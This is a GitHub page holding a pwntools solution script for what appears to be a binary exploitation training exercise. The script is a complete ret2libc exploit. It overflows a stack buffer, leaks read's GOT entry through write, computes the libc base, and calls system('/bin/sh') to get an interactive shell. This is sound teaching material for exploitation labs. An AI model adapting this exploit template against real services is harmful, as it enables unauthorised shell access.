-
Notifications
You must be signed in to change notification settings - Fork 60
/
Copy pathsoln_exercise-4.py
36 lines (28 loc) · 1017 Bytes
/
soln_exercise-4.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
context(arch='i386', os='linux') # <-- Add the architecture and os
binary = ELF("exercise-4")
libc = ELF("libc.so.6")
write_plt = p32(binary.symbols["write"])
read_GOT = p32(binary.symbols["got.read"])
read_plt = p32(binary.symbols["read"])
bss_addr = p32(binary.symbols["__bss_start"])
pop_ret = "\x9d\x85\x04\x08"
r=process("./exercise-4")
"""
You can use these to test it as a server over localhost
r=remote("127.0.0.1",1337)
run this in a different terminal VVVV
socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4"
"""
r.recvline()
exploit = "A"*140
exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4)
exploit += p32(binary.symbols["main"])
r.sendline(exploit)
addr_read = int(r.recv(4)[::-1].encode("hex"),16)
r.recvline()
libc_base = addr_read - libc.symbols["read"]
system = p32(libc_base + libc.symbols["system"])
binsh = p32(libc_base + libc.search("/bin/sh").next())
r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148?
r.interactive()